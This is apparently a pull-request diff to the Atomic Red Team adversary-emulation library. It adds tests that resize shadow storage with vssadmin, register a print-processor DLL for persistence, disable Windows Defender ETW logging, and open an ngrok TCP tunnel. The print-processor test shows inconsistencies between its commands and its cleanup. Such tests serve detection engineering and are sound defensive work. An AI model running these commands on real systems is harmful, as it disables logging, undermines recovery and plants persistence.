[pull] master from redcanaryco:master

.github/dependabot.yml

@@ -0,0 +1,11 @@
+# To get started with Dependabot version updates, you'll need to specify which
+# package ecosystems to update and where the package manifests are located.
+# Please see the documentation for all configuration options:
+# https://docs.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
+
+version: 2
+updates:
+  - package-ecosystem: "pip" # See documentation for possible values
+    directory: "/" # Location of package manifests
+    schedule:
+      interval: "weekly"

atomics/T1490/T1490.yaml

@@ -135,3 +135,12 @@ atomic_tests:
       reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: Windows - vssadmin Resize Shadowstorage Volume
+  description: 
+    Adversaries generally try to Resize Shadowstorage Volume using vssadmin.exe to avoid the shadow volumes being made again. This technique is typically found used by adversaries during a ransomware event and a precursor to deleting the shadowstorage.
+  supported_platforms:
+  - windows
+  executor:
+    command: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%'
+    name: powershell
+    elevation_required: true

atomics/T1547.012/T1547.012.yaml

@@ -0,0 +1,36 @@
+attack_technique: T1547.012
+display_name: 'Boot or Logon Autostart Execution: Print Processors'
+atomic_tests:
+- name: Print Processors
+  description: |
+    Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+    The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+    Note: The test assumes a x64 Windows operating system.
+
+    The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+  supported_platforms:
+  - windows
+  input_arguments:
+    restart:
+      description: set to 1 if you want the computer to reboot as part of the test
+      type: integer
+      default: 0
+  executor:
+    command: |
+      net stop spooler
+      Copy-Item $PathToAtomicsFolder\T1547.012\bin\PrintProcessor.dll C:\Windows\System32\spool\prtprocs\x64\PrintProcessor.dll
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "PrintProcessor.dll" /t REG_SZ /f
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /f >nul 2>&1
+      net start spooler
+      if(#{restart}){
+        Restart-Computer
+      }
+    cleanup_command: |
+      net stop spooler
+      rm -force C:\Windows\System32\spool\prtprocs\x64\PrintProcessor.dll
+      rm -force C:\Users\Public\AtomicRedTeam.txt
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /f >nul 2>&1
+      net start spooler
+    name: powershell
+    elevation_required: true

atomics/T1547.012/src/dllmain.cpp

@@ -0,0 +1,70 @@
+#include "pch.h"
+#include <windows.h>
+#include <stdio.h>
+#include <fstream> 
+
+#define DllExport __declspec(dllexport)
+
+extern "C" __declspec(dllexport) void PayloadFunction()
+{
+    std::ofstream outfile("C:\\Users\\Public\\AtomicTest.txt");
+    outfile << "AtomicRedTeam test for T1547.012" << std::endl;
+    outfile.close();
+}
+
+extern "C" DllExport BOOL ClosePrintProcessor(HANDLE hPrintProcessor)
+{
+    return 1;
+}
+
+extern "C" DllExport BOOL ControlPrintProcessor(HANDLE hPrintProcessor, DWORD Command)
+{
+    return 1;
+}
+
+BOOL EnumPrintProcessorDatatypesW(LPWSTR pName, LPWSTR pPrintProcessorName, DWORD Level, LPBYTE pDatatypes, DWORD cbBuf, LPDWORD pcbNeeded, LPDWORD pcReturned)
+{
+    // executes when DLL is loaded
+    return 1;
+}
+
+extern "C" DllExport DWORD GetPrintProcessorCapabilities(LPTSTR pValueName, DWORD dwAttributes, LPBYTE pData, DWORD nSize, LPDWORD pcbNeeded)
+{
+    return 0;
+}
+
+typedef struct _PRINTPROCESSOROPENDATA {
+    PDEVMODE pDevMode;
+    LPWSTR   pDatatype;
+    LPWSTR   pParameters;
+    LPWSTR   pDocumentName;
+    DWORD    JobId;
+    LPWSTR   pOutputFile;
+    LPWSTR   pPrinterName;
+} PRINTPROCESSOROPENDATA, * PPRINTPROCESSOROPENDATA, * LPPRINTPROCESSOROPENDATA;
+
+extern "C" DllExport HANDLE OpenPrintProcessor(LPWSTR pPrinterName, PPRINTPROCESSOROPENDATA pPrintProcessorOpenData)
+{
+    return (HANDLE)11;
+}
+
+extern "C" DllExport BOOL PrintDocumentOnPrintProcessor(HANDLE hPrintProcessor, LPWSTR pDocumentName)
+{
+    return 1;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
+{
+    switch (fdwReason)
+    {
+    case DLL_PROCESS_ATTACH:
+        PayloadFunction();
+        break;
+    case DLL_THREAD_ATTACH:
+    case DLL_PROCESS_DETACH:
+    case DLL_THREAD_DETACH:
+        break;
+    }
+
+    return 1;
+}

atomics/T1562.006/T1562.006.yaml

@@ -135,26 +135,28 @@ atomic_tests:
   description: |
     An adversary can disable the ETW Provider of Windows Defender,
     so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
   supported_platforms:
   - windows
   executor:
     command: |
-      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /t REG_DWORD /d 0 /f
+      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
     cleanup_command: |
-      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /f >nul 2>&1
+      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
     name: command_prompt
     elevation_required: true
 - name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
   auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
   description: |
     An adversary can disable the ETW Provider of Windows Defender,
     so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
   supported_platforms:
   - windows
   executor:
     command: |
-      New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational  -PropertyType DWord -Value 0 -Force
+      New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force
     cleanup_command: |
-      Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore
+      Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
     name: powershell
     elevation_required: true

atomics/T1572/T1572.yaml

@@ -139,7 +139,7 @@ atomic_tests:
   executor:
     command: |
       C:\Users\Public\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null
-      Start-ThreadJob -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null
+      Start-Job -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null
       Start-Sleep -s 5 
       Stop-Job -Name Job1 | Out-Null
     cleanup_command: |